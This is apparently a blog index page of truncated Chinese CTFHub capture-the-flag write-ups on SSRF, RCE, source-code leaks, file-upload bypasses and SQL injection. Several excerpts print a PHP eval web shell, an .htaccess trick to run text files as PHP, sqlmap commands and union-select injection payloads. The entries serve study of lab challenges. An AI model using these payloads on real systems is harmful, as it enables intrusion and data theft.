![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTFHub-wp
不想弹solo
_
展开
-
CTFHub-SSRF_内网访问-wp
SSRF是什么?SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。通过扫描靶场的端口开放信息,发现了部署在8080端口上的 http-proxy 服务,说明我们将此url中的url参数作为内网转发的url,相当于控制某个主机后在其内网中横向移动查看题目中的提示可知,文件在 127.0.0.1/flag.php 中直接在url原创 2021-06-27 19:50:02 · 378 阅读 · 3 评论 -
CTFHub-RCE_eval执行-wp
首先看看RCE是什么RCE英文全称:remote command/code execute分为远程命令执行ping和远程代码执行evel。漏洞出现的原因:没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞———.原创 2021-06-21 20:12:58 · 391 阅读 · 0 评论 -
CTFHub-hg泄露-wp
Mercurial与前面做的SVN、Git属于一种类型Mercurial 是一种轻量级分布式版本控制系统,采用 Python 语言实现,易于学习和使用,扩展性强。其是基于 GNU General Public License (GPL) 授权的开源项目。直接进入正题,使用dirmap跑跑目录康康发现存在 .hg 目录,直接使用kali linux下的 dvcs-ripper 中的 rip-hg.pl 将其 .hg 文件拿下./rip-hg.pl -v -u http://challen.原创 2021-06-16 20:23:57 · 383 阅读 · 0 评论 -
CTFHub-SVN泄露-wp
SVN又是一个知识盲区,先百度看看1.SVN是subversion的缩写,是一个开放源代码的版本控制系统,通过采用分支管理系统的高效管理,简而言之就是用于多个人共同开发同一个项目,实现共享资源,实现最终集中式的管理。2.相较于git,svn通常需要一个集中的服务器来控制,而git为分布式控制系统,户端并不只提取最新版本的文件快照,而是把原始的代码仓库完整地镜像下来。这么一来,任何一处协同工作用的服务器发生故障,事后都可以用任何一个镜像出来的本地仓库恢复。这类系统都可以指定和若干不同的远端代码仓库进.原创 2021-06-16 19:25:59 · 614 阅读 · 0 评论 -
CTFHub-git泄露_index-wp
用githacker直接下载有手就行原创 2021-06-11 17:25:49 · 217 阅读 · 0 评论 -
CTFHub-git泄露_stash-wp
有了上次 log 的经验,这次直接使用GitHacker下载源代码至文件夹中先来康康日志既然题目是stash,去查查git stash是干什么的git stash用于想要保存当前的修改,但是想回到之前最后一次提交的干净的工作仓库时进行的操作.git stash将本地的修改保存起来,并且将当前代码切换到HEAD提交上.通过git stash存储的修改列表,可以通过git stash list查看.git stash show用于校验,git stash apply用于重新存储...原创 2021-06-11 17:12:40 · 202 阅读 · 2 评论 -
CTFHub-git泄露_log-wp
首先康康git泄露是个啥玩意当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。通常情况下下载 .git 文件中会存在网页的快照【快照:关于指定数据集合的一个完全可用拷贝,该拷贝包括相应数据在某个时间点(拷贝开始的时间点)的映像。快照可以是其所表示的数据的一个副本,也可以是数据的一个复制品】Git有三种状态:已修改(modified)、已暂存(staged)、已提交(committed).git文件的结构:原创 2021-06-09 20:12:24 · 241 阅读 · 0 评论 -
CTFHub-.DS_Store-wp
又是一个不知道的名词,再次使用度娘 & CSDN.DS_Store使用于MacOS是用来存储这个文件夹的显示属性的:比如文件图标的摆放位置,通过.DS_Store可以知道这个目录里面所有文件的清单。大概知道要干嘛似乎就是拿到 .DS_Store 文件,查看目录并获取flag一遍成功下载该文件用文档打开,没有MacOS凑合看看勉强能看懂可知flag在文件名为a43b7c53ba9a7eca2759acaf7ac67c59.txt的文件中搞定...原创 2021-06-08 23:10:28 · 205 阅读 · 0 评论 -
CTFHub-vim缓存文件-wp
查看题目,vim缓存明显属于知识范围外的内容,先使用CSDN 和 度娘康康资料在使用vim时会创建临时缓存文件,关闭vim时缓存文件则会被删除,当vim异常退出后,因为未处理缓存文件,导致可以通过缓存文件恢复原始文件内容以 index.php 为例:第一次产生的交换文件名为 .index.php.swp再次意外退出后,将会产生名为 .index.php.swo 的交换文件第三次产生的交换文件则为 .index.php.swn了解了vim缓存文件的简单原理后,查看题目可知v.原创 2021-06-08 21:32:11 · 583 阅读 · 0 评论 -
CTFHub-bak文件-wp
bak文件:.bak是备份文件,为文件格式扩展名,这类文件一般在.bak前面加上应该有原来的扩展名比如windows.dll.bak,或是windows_dll.bak,有的则是由原文件的后缀名和bak混合而成,如proteus的备份文件为.DBK。很多软件,如editplus,在生成了某种类型的文件后,就会自动生成它的备份文件,如果不想要备份文件的话,可以通过打开菜单栏上的工具->参数选择->文件,把“保存时自动创建备份文件”前的勾取消就行了,其他软件如CAD、KEIL等软件也可以通过相关的设原创 2021-06-07 22:07:42 · 456 阅读 · 0 评论 -
CTFHub-网站源码-wp
根据网站提示,可知只要测试出网站源码备份的文件名称即可通过备份内容得出flag,故自制测试脚本import requestsurl=(input("URL:"))list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']list2=['tar', 'tar.gz', 'zip', 'rar']for i in list1: for j in list2: url_f=url+'/'+i+'..原创 2021-06-07 21:50:52 · 1013 阅读 · 0 评论 -
CTFHub-.htaccess验证-wp
.htaccess正常上传测试,发现可以上传图片类文件以及.txt文件,但不能上传 .php文件查询资料可知, .htaccess文件为"分布式配置文件",属于后端中间件的验证但存在子目录中的指令会覆盖更高级目录或者主服务器配置文件中的指令这种操作,于是可以考虑自行上传配置文件思路:构造 .htaccess文件,使txt文件能在服务器端以php文件运行<!--FileMatch 参数为文件名的正则匹配--><FilesMatch "txt"> SetHa原创 2021-05-30 18:41:05 · 174 阅读 · 1 评论 -
CTFHub-文件头检查-wp
文件头检查上传包含一句话木马的php文件,发现不能正常上传,只能上传图片类文件使用画图自制简单的PNG图像,上传发现可以上传成功使用BurpSuite截取请求 将filename="666.png"改为filename="666.php"但不对文件的编码进行修改,发现可以上传成功删除原PNG文件编码内容,只留下验证格式部分,并插入一句话木马Forward放包,上传成功,回显路径访问路径,并使用HackBar验证访问路径,并使用HackBar验证成功后使用蚁剑连接原创 2021-05-18 23:05:15 · 292 阅读 · 0 评论 -
CTFHub-前端验证上传-wp
JS前端验证文件上传使用一句话木马<?php @eval($_POST['a']); ?>并保存为.php文件尝试上传 发现 .txt .php 文件都无法正常上传,只能上传 “.jpg" ".jpeg” “*.png” 文件。于是将 123.php 改为 123.jpg ,正常上传由于JS验证属于前端验证,我们可以通过BurpSuite拦截请求并修改文件后缀 forward放包上传成功并回显相对路径复制路径并访问,使用Hack原创 2021-05-18 23:04:11 · 132 阅读 · 0 评论 -
CTFHub-无验证上传-wp
无验证文件上传使用一句话木马<?php @eval($_POST['a']); ?>并保存为.php文件上传成功并回显相对路径复制路径并访问,使用HackBar进行POST传参验证木马可行性执行成功使用蚁剑工具对木马进行连接连接成功拿下flag...原创 2021-05-18 23:02:10 · 170 阅读 · 0 评论 -
CTFHub-空格过滤-wp
空格过滤**原理:**在php中提前写好当输入字符中有空格时返回 “Hacker!!!” 来防止sql注入空格为空字符,可用php中的多行注释/**/来代替空格,以正常执行sql语句剩余做法与整数型注入相同原创 2021-05-18 23:00:00 · 246 阅读 · 0 评论 -
CTFHub-referer注入-wp
referer注入注入点如图测试出能够注入后使用字符型注入语法即可sqlmap做法同UA注入HTTP_REFERER简介HTTP_REFERER简介HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。...原创 2021-05-18 22:59:17 · 283 阅读 · 0 评论 -
CTFHub-UA注入-wp
UA注入方法一:手注使用BurpSuite进行截断,并使用Repeater改包 如图所示,对User-Agent处进行修改,点击Go之后页面出现变化输入1+1 ,页面返回 id=2 说明存在字符型注入漏洞使用 1 order by … 测试得字段数为2如图,开始注入,爆出库名爆出表名爆出列名爆出数据,拿到flagctfhub{5ba8fd44460a9858b2ba1510}方法二:sqlmap使用指令python sqlmap.py -原创 2021-05-18 22:58:21 · 272 阅读 · 0 评论 -
CTFHub-Cookie注入-wp
Cookie注入sqlmap设置代理,使用BurpSuite进行截断,并复制出Request信息,放置于txt文件中使用python sqlmap.py -r 123.txt --level=2进行扫描 发现存在Cookie中id参数的注入漏洞使用python sqlmap.py -u "..." --dbs爆出数据库名python sqlmap.py -u "..." -D sqli -tables爆出表名python sqlmap.py -u "原创 2021-05-18 22:56:29 · 172 阅读 · 0 评论 -
CTFHub-时间盲注-wp #(自制脚本做法)
时间盲注脚本# -*- coding: utf-8 -*-# @Time : 2021/5/16 19:29# @Author : z1moq# @File : ctfhub时间盲注.py# @Software: PyCharmimport requestsimport stringimport timedef get_database(url): database = '' for i in range(1, 9): for j in string.as原创 2021-05-16 20:04:09 · 5110 阅读 · 0 评论 -
CTFHub-MYSQL结构-wp
MySQL结构对注入条件进行测试输入 1 时正常返回输入 1’ 时无法正常返回输入 1+1 时正常返回 id=2 的值说明存在整数型SQL注入使用 order by 检查字段数字段数为 2使用 1 union select 1,2,3 检查输出字段数与order by 得出的结果相同-1 union select 1,database()#得出表名:sqli-1 union select 1,group_concat(table_name) from informa原创 2021-05-16 18:38:03 · 199 阅读 · 0 评论 -
CTFHub-布尔盲注-wp #(自制脚本做法)
CTFHub布尔盲注脚本# -*- coding: utf-8 -*-# @Time : 2021/5/15 21:33# @Author : z1moq# @File : ctfhub布尔盲注.py# @Software: PyCharmimport requestsimport stringdef get_database(url, mark): database = '' for i in range(1, 9): for j in string.a原创 2021-05-15 21:46:56 · 3757 阅读 · 0 评论 -
CTFHub-布尔/时间盲注-wp #(sqlmap做法)
布尔盲注/时间盲注(sqlmap做法)使用python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --banner扫描网站发现存在漏洞使用python sqlmap.py -u "http://challenge-04d5601f15447473.sandbox.ctfhub.com:10080/?id=1" --current-db跑出库名使用pyth原创 2021-05-15 14:56:15 · 3090 阅读 · 1 评论 -
CTFHub-报错注入-wp
报错注入输入1,返回正常输入 1’ ,出现报错提示You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 可知在有 ’ 字符型闭合符时会产生报错使用 order by 查询字段数结果在字段数为3时产生报错使用select 1,2原创 2021-05-09 22:44:13 · 245 阅读 · 0 评论 -
CTFHub-字符型注入-wp
字符型注入输入1数据正常返回输入1+1 仍返回 ID=1 的值,说明不存在整数型SQL注入漏洞输入' or 1=1 #能正常返回 所以存在以单引号闭合的字符型注入输入1' order by 1 #1' order by 2 #1' order by 3 #在值为3时无法正常显示页面所以页面显示输出字段数为2输入-1' union select 1,database() #获取数据库名继续输入-1' union sel原创 2021-05-09 20:01:53 · 174 阅读 · 0 评论 -
CTFHub-整数型注入-wp
整数型注入由题目知此SQL注入为整数型注入,则在注入命令执行时无闭合字符输入1得到 ID=1 的正常返回结果输入1+1得到 ID=2 的正常返回结果,说明存在SQL注入分别输入1 order by 11 order by 2返回结果正常输入1 order by 3时无法返回正常值,所以可以判断该网页输出字段数为2输入-1 union select 1,database()获取库名输入-1 union select 1,group_con原创 2021-05-09 19:58:40 · 253 阅读 · 0 评论